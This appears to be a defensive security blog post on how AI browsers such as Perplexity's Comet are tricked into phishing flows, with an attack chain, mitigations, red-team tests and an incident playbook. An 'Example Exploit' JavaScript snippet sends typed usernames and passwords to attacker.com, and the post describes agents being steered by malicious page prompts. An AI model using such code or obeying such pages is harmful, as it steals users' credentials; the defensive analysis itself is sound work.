Researchers Trick Perplexity's Comet AI Browser Into Phishing Scam in Under Four Minutes

---

title: Why AI Browsers Keep Getting Tricked—And How to Actually Defend Them
author: Sam R. (Senior DevSecOps Engineer, 16 years, independent consultant. LinkedIn | GitHub | Speaker: DEF CON, OWASP AppSec EU) date: 2024-06-03

TL;DR: What You Need to Know

• AI-powered browsers can be phished, hijacked, or coerced into unsafe actions—this is a real and proven risk (Guardio Security Labs, OWASP AI Security).
• Attackers exploit unsandboxed agent actions, weak permissions, and poorly validated input—to harvest credentials or escalate privileges.
• Defensive moves: Harden permissions, enforce CSP, sandbox everything, adversarial test agent logic, log all agent actions with justification. (See actual checklist below.)
• If your stack includes an AI browser or agent: stop trusting defaults, start threat modeling, and review these attack chains before you ship.

---

Who This Affects

• Developers: You're responsible for sandboxing agent actions, setting up CSP, and removing unnecessary privileges.
• Security Engineers: Red-team AI agent logic, review logs for agent impersonation, conduct adversarial prompt fuzzing, and implement alerting for anomalous agent clicks.
• Product Owners: Threat-model demos and features involving AI agents, set up demo gating, require security reviews on any agent-enabled releases.
• For further hands-on guidance, dive into OWASP AI Security, OWASP DOM-XSS, and Chrome’s Extension Security Guide.

---

Attack Chain: How AI Browsers Are Trick-Phished

Recent research (Guardio Security Labs, May 2024) shows so-called “autonomous” AI agents are easy prey for phishing attacks. Here’s the typical chain:

1. Entry Vector: Attacker creates a fake login or payment page—delivered via malicious link or redirect. Page mirrors a real brand with domain lookalikes (e.g., secure-payrnents.com).
2. Agent Capability Abused: Agent parses DOM, clicks buttons, or fills forms “autonomously.” No human oversight. In Guardio’s demo, Comet AI’s agent ignored SSL/TLS warnings and completed a credential-stealing flow.
3. Execution Mechanics:
   • Spoofed login page triggers agent to input credentials (prompted by a malicious dialog).
   • Agent executes event handlers attached to fake buttons (onClick fires AJAX POST to attacker backend).
   • Unsandboxed execution allows access to session cookies (via document.cookie), and agent submits full credential payload.
4. Post-Exploitation Impact: Attacker receives genuine credentials, can now pivot to privilege escalation, session hijacking, or credential stuffing (OWASP Credential Stuffing Cheat Sheet).

Key technical flaws:

• No strict CSP (Content-Security-Policy) to block injected scripts.
• Overprivileged agent access (e.g., DOM read/write, cookie access, unrestricted navigation).
• Weak input validation—agents trust malformed or intentionally ambiguous URLs.

---

Technical Breakdown: Why Agents Fail This Test

AI browsers extend browser automation (think Selenium) with LLM-driven logic. That means:

• Bots interpret UI, but lack context. They’ll click "Confirm" on anything that matches a prompt.
• Unsandboxed execution: agents run in privileged contexts—can access cookies, localStorage, sometimes even browser APIs (Chrome Extension Security).
• Input validation is minimal. Regex checks (“does url contain 'login'?”) fail to catch sophisticated phishing pages. Advanced attackers exploit predictable agent behaviors.

Example Exploit:

// Attacker injects this into a fake login button
document.getElementById('login-btn').addEventListener('click', function() {
    fetch('https://attacker.com/collect', { 
        method: 'POST', 
        body: JSON.stringify({user: document.getElementById('user').value, pass: document.getElementById('pass').value}) 
    });
});

If your AI agent fills login fields and clicks without verifying domain or SSL status, you’re toast (see OWASP DOM-Based XSS Guide).

---

Quick Mitigations Checklist

• Content Security Policy (CSP):
  Set headers to disallow inline scripts and restrict origins:

  • Example: Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
  • CSP Configuration Examples

• SameSite Cookies:
  Enforce SameSite=Strict for all cookies via server response headers.

  • SameSite Cookie Docs

• Sandbox All Untrusted Actions:
  Use <iframe sandbox="allow-scripts allow-same-origin"> and enforce restricted browser contexts for agent operations.

  • MDN iframe Sandbox Guide

• Kill Overprivilege:
  Remove unnecessary access from browser agents (no direct access to document.cookie, browser APIs, or unrestricted navigation).

• Step-Up Authentication:
  Require MFA or human confirmation for high-risk actions (payments, password changes).

• Adversarial Testing:
  Fuzz agent logic with malicious UI prompts. Run red-team unit tests in CI that mimic phishing and script injection vectors.

---

Testing & Red-Teaming: How to Break Your Own Agents

• Agent Prompt Fuzzing:
  Inject misleading instructions (“Click the blue button to confirm payment”) and track how agents react.
• Fake Login Screen Attacks:
  Generate login-like pages with typosquatting URLs and analyze agent behavior under simulated phishing conditions.
• JS Injection Validation:
  Serve pages with innocuous and malicious JS—track if agents execute scripts they shouldn’t.
• CI Gate Adversarial Tests:
  Automate red-team scenarios in pipeline. Block releases if agent fails validation (e.g., completes credential submission to unverified endpoints).

---

Incident Response Playbook: When Your AI Agent Gets Tricked

• Revoke agent tokens immediately.
• Rotate API keys for affected integrations.
• Audit logs: Search for agent actions (timestamps, domains accessed, user impersonation).
• Inspect WebRequest/netlogs: Find anomalous POSTs or credential leaks.
• Notify impacted users: Disclose breach, prompt password resets.
• Add forensic triggers: Require signed, timestamped justification for agent actions in logs—no silent clicks.

For more robust playbooks, start with OWASP Incident Response Guide.

---

Further Reading

• Guardio Security Labs: How AI Browsers Get Phished
• OWASP AI Security Project
• OWASP DOM-Based XSS
• Chrome Extension Security Model
• Verizon DBIR 2023 Report

---

Closing Thought

If your AI agent can click "Pay Now" without explaining why—or you haven’t adversarially tested its behavior—then your risk isn’t hypothetical. It’s inevitable. Will your next demo make the news, or the breach report?